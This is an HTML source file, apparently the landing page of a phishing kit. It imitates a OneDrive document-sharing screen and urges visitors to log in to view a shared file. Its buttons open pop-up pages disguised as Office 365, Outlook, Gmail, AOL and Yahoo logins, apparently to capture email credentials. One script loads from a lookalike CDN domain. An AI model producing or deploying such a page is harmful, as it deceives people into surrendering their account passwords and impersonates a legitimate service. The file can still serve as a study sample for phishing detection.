<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="user-scalable=no, width=device-width, initial-scale=1">
        <title>One Drive Cloud Document Sharing</title>
        <link rel="icon" type="image/png" href="img/one.png" />
		<link rel="stylesheet" href="bootstrap/css/bootstrap.min.css">
		<!--[if lt IE 9]>
			<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
			<script src="https://oss.maxsdn.com/respond/1.4.2/respond.min.js"></script>
        <![endif]-->
        <style>
            body, html {
                height: 100%;
                margin: 0;
                background-image: url("img/on1.png");
                background-position: center;
                background-repeat: no-repeat;
                background-size: cover;     
}
        </style>
    </head>
    <body>
        <div class="container">
            <div class="row">
                <div class="col-sm-3">
                </div>
                <div class="col-sm-6" style="background-color:#4082d8;">
                    <center>
                    <img style="margin-top:10%;" src="img/onedrive.png">
                    <br>
                    <br>
                    <p class="text-center" style="color:white;font-family:sans-serif;">To read the document, please choose your email provider below <br><br>Login to view shared file.</p>
                    <br>
                    <div class="btn-group-vertical">

                                <button style="background-color: #FF8458;color:white;" type="button" class="btn btn-lg" onClick="window.open('office.html','mywindow','width=400,height=480,toolbar=no,location=no,directories=no,statu s=no,menubar=no,scrollbars=yes,copyhistory=no,resizable=yes')"> <img src="img/office.png"> Login with Office 365</button>
                                <br>

                                
                                <button style="background-color: #0A2457;color:white;" type="button" class="btn btn-lg" onClick="window.open('outlook.html','mywindow','width=400,height=480,toolbar=no,location=no,directories=no,statu s=no,menubar=no,scrollbars=yes,copyhistory=no,resizable=yes')"> <img src="img/outlook.png"> Login with Outlook</button>
                                <br>

                                <div class="dropdown">
                                <button style="background-color: darkcyan;color:white;" type="button" data-toggle="dropdown" class="btn btn-lg dropdown-toggle"> <img src="img/mail.png"> Login with other mail <span class="caret"></span></button>
                                <ul class="dropdown-menu">
                                  <li><a class="btn" href="" onClick="window.open('gmail.html','mywindow','width=400,height=480,toolbar=no,location=no,directories=no,statu s=no,menubar=no,scrollbars=yes,copyhistory=no,resizable=yes')">  <img src="img/gmail.png"> Gmail</a></li>
                                  <li><a class="btn"  href="" onClick="window.open('aol.html','mywindow','width=400,height=480,toolbar=no,location=no,directories=no,statu s=no,menubar=no,scrollbars=yes,copyhistory=no,resizable=yes')"><img src="img/aol.png"> Aol</a></li>
                                  <li><a class="btn"  href="" onClick="window.open('yahoo.html','mywindow','width=400,height=480,toolbar=no,location=no,directories=no,statu s=no,menubar=no,scrollbars=yes,copyhistory=no,resizable=yes')"><img src="img/yahoo.png"> Yahoomail</a></li>
                                  <li><a class="btn"  href="" onClick="window.open('mail.html','mywindow','width=400,height=480,toolbar=no,location=no,directories=no,statu s=no,menubar=no,scrollbars=yes,copyhistory=no,resizable=yes')"><img src="img/mail.png"> Mail</a></li>
                                </ul>
                                <br>
                                
                            </div>

                                

                                
                        
                        </div>
                        <p style="color:white;font-family: sans-serif;padding: 50px;">Get to all your files from anywhere on any device, and share them with anyone. One Drive your shared document in one cloud.</p>
                        
                        <br>
                        <br>
                        <br>
                        <br>
                        <br>
                   
                    </center>
                    
                   
                </div>
                <div class="col-sm-3">
                    <br>
                    <br>

                </div>
            </div>
        </div>

        <script src="bootstrap/jquery-3.2.1.min.js" charset="utf-8"></script>
        <script src="bootstrap/js/bootstrap.min.js" charset="utf-8"></script>
    </body>
</html>